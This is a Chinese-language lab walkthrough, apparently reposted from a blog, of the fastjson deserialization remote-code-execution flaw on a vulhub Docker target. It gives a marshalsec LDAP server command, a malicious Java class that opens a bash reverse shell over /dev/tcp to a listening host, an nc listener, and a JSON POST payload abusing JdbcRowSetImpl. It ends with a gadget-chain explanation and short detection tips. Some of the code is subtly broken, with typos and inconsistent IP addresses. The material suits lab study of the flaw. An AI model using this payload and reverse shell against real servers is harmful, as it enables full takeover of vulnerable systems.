fastjson版本<1.2.24 <1.2.27
序列化时会调用成员变量的get方法,私有成员变量不会被序列化。
反序列化时,会调用成员变量的set方法,public修饰的成员全部自动赋值。
2.1 环境搭建
vulhub靶场
#1 下载靶场
git clone https://github.com/vulhub/vulhub.git
cd vulhub/fastjson/1.2.24-rce
#2 编译,运行
docker-compose build
docker-compose up -d
#3 查看IP和端口
docker-compose ps
docker ps
#4 关闭靶场
docker-compose down这里进入vulhub目录太慢了,而且路径也容易记错。可以篡改系统命令,添加命令别名。
vim ~/.bashrc
#在合适的位置添加如下语句
alias vulhub='cd /var/local/soft/vulhub;ls'
#保存并退出
source ~/.bashrc靶机:centos 192.168.131.121
监听主机:Kali 192.168.131.134:9999
其他环境与Log4j相同——
2.2 测试
LDAP服务器中,执行如下代码
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.101.128:2222/#GetShell 1234其中getshell是恶意类的类名,1234是监听的端口号,该工具可以启动JNDI或RMI接口。
当命令行显示Listening on 0.0.0.0:1234时表示服务开启成功。
构建一个恶意类GetShell.class
/\*
\* getshell.java
\* 将其编译后生成Exploit.class
\* 上传到HTTP服务器
\*/
public class GetShell{
public GetShell(){
Runtime.getRuntime.exec("bash -i >&/dev/tcp/192.168.101.134/9999 0>&1");//监听主机的IP和端口号
}
public static void main(Sring[] args){
GetShell e = new GetShell();
}
}
//直接使用静态代码块亦可监听主机Kali开启监听:
nc -lvp 9999 # 9999是监听反弹shell的端口这时,可以向靶场环境以POST的方式发送数据(payload)如下
POST /HTTP/1.1
Host:xxxxxxxx
...
Content-Type:application/json
Content-Length:146
{
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.101.133:1234/GetShell",
"autoCommit":true
}
}反弹shell成功即可。
2.3 过程分析
用到的反序列化方法
//返回实际类型的对象
Object returnObj = JSON.parseObject(serializedStr,returnObject.class);
//返回JsonObject对象
Object obj = JSON.parse(serializedStr);//子类中包含接口或抽象类时,类型丢失
{"@type":"com.xxx.User","age":2,"flag":false,"name":"zhangsan"}利用类
com.sun.rowset.JdbcRowSetImpl
使用时会引入一个dataSourceName支持传入一个rmi数据源,可以实现JNDI、LDAP端口注入攻击。
流程
序列化字符:准备类名、dataSourceName属性和autoCommit属性;
JdbcRowSetImpl反序列化,调用JdbcRowSetImpl的setAutoCommit(),setAutoCommit()调用connect();
connect()调用lookup()链接到LDAP/RMI服务器,下载恶意代码到本地,执行攻击。
3 漏洞防御
3.1 排查方法
- 找到发送JSON序列化数据的接口
- 抓包判断是否使用fastjson
- 传入不完整或错误的json数据,{“xx”:"查看返回的数据是否暴露
- 使用dnslog ceye检测
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
